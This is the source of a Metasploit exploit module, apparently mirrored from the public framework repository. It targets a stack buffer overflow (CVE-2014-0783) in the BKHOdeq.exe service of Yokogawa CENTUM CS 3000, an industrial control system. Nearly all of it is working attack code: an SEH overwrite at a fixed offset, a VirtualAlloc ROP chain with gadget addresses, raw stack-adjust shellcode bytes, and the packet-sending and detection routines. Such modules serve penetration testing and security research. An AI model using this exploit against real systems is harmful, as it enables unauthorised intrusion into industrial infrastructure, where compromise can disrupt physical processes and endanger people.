CoCalc -- yokogawa_bkhodeq

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb
¹⁹⁵⁰⁰ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Seh
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow',
17
        'Description' => %q{
18
          This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability
19
          exists in the service BKHOdeq.exe when handling specially crafted packets. This module has
20
          been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows
21
          2003 SP2.
22
        },
23
        'Author' => [
24
          'juan vazquez',
25
          'Redsadic <julian.vilas[at]gmail.com>'
26
        ],
27
        'References' => [
28
          [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ],
29
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ],
30
          [ 'CVE', '2014-0783']
31
        ],
32
        'Payload' => {
33
          'Space' => 6000,
34
          'DisableNops' => true,
35
          'BadChars' => ":\r\n"
36
        },
37
        'Platform' => 'win',
38
        'Targets' => [
39
          [
40
            'Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
41
            {
42
              'Ret' => 0x0042068e, # stackpivot from 2488 BKHOdeq.exe # ADD ESP,9B8 # RETN
43
              'Offset' => 8660,
44
              'StackPivotAdjustment' => 108
45
            }
46
          ]
47
        ],
48
        'DefaultOptions' => {
49
          'EXITFUNC' => 'thread',
50
          'WfsDelay' => 10
51
        },
52
        'DisclosureDate' => '2014-03-10',
53
        'DefaultTarget' => 0,
54
        'Notes' => {
55
          'Reliability' => UNKNOWN_RELIABILITY,
56
          'Stability' => UNKNOWN_STABILITY,
57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
58
        }
59
      )
60
    )
61

62
    register_options(
63
      [
64
        # Required for EIP offset
65
        Opt::RPORT(20171)
66
      ]
67
    )
68
  end
69

70
  def check
71
    # It forces an huge allocation, which should fail,
72
    # and return back an error answer from the server
73
    # while parsing the packet header.
74
    pkt = build_pkt(0xffffffff)
75
    res = send_pkt(pkt)
76
    if valid_response?(res)
77
      return Exploit::CheckCode::Detected
78
    end
79

80
    Exploit::CheckCode::Safe
81
  end
82

83
  def exploit
84
    my_payload = payload.encoded
85
    rop_chain = create_rop_chain
86

87
    data = rand_text(target['StackPivotAdjustment'])
88
    data << rop_chain
89
    data << stack_adjust
90
    data << my_payload
91
    data << rand_text(target['Offset'] - data.length)
92
    data << generate_seh_record(target.ret)
93

94
    pkt = build_pkt(data.length, data)
95

96
    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
97
    connect
98
    sock.put(pkt)
99
    disconnect
100
  end
101

102
  def build_pkt(data_length, data = "")
103
    header = rand_text(4)             # iMark
104
    header << [data_length].pack("N") # Data length
105
    header << rand_text(4)            # NumSet
106
    header << rand_text(2)            # req
107
    header << rand_text(2)            # Unknown
108

109
    pkt = header + data
110

111
    pkt
112
  end
113

114
  def send_pkt(data)
115
    connect
116
    sock.put(data)
117
    res = sock.get_once
118
    disconnect
119

120
    res
121
  end
122

123
  def valid_response?(data)
124
    return false unless data
125
    return false unless data.length == 4
126
    return false unless result_code(data) == 0
127

128
    true
129
  end
130

131
  def result_code(data)
132
    data.unpack("N").first
133
  end
134

135
  def stack_adjust
136
    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
137
    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
138
    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
139
    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
140

141
    adjust
142
  end
143

144
  def create_rop_chain
145
    # rop chain generated with mona.py - www.corelan.be
146
    rop_gadgets =
147
      [
148
        0x63b27a60,  # RET # padding on XP SP3
149
        0x63b27a60,  # RET # padding on XP SP3
150
        0x63b27a5f,  # POP EAX # RETN [libbkhMsg.dll]
151
        0x61e761e0,  # ptr to &VirtualAlloc() [IAT LibBKCCommon.dll]
152
        0x61e641e4,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [LibBKCCommon.dll]
153
        0x00405522,  # PUSH EAX # TEST EAX,C0330042 # POP ESI # ADD ESP,6D8 # RETN [BKHOdeq.exe]
154
      ].flatten.pack("V*")
155
    rop_gadgets << rand_text(1752) # Padding because of the "ADD ESP,6D8" instr
156
    rop_gadgets << [
157
      0x61e62aa4, # POP EBP # RETN [LibBKCCommon.dll]
158
      0x61e648c0,  # & push esp # ret  [LibBKCCommon.dll]
159
      0x66f3243f,  # POP EBX # RETN [libBKBEqrp.dll]
160
      0x00000001,  # 0x00000001-> ebx
161
      0x61e729dd,  # POP EDX # MOV EAX,5E5FFFFF # RETN [LibBKCCommon.dll]
162
      0x00001000,  # 0x00001000-> edx
163
      0x63a93f6f,  # POP ECX # RETN [libbkhopx.dll]
164
      0x00000040,  # 0x00000040-> ecx
165
      0x63ad1f6a,  # POP EDI # RETN [libbkhOdeq.dll]
166
      0x63dd3812,  # RETN (ROP NOP) [libbkhCsSrch.dll]
167
      0x61e60b4c,  # POP EAX # RETN [LibBKCCommon.dll]
168
      0x90909090,  # nop
169
      0x63ae5cc3,  # PUSHAD # RETN [libbkhOdbh.dll]
170
    ].flatten.pack("V*")
171

172
    rop_gadgets
173
  end
174
end
175

176
Product

Resources

Company
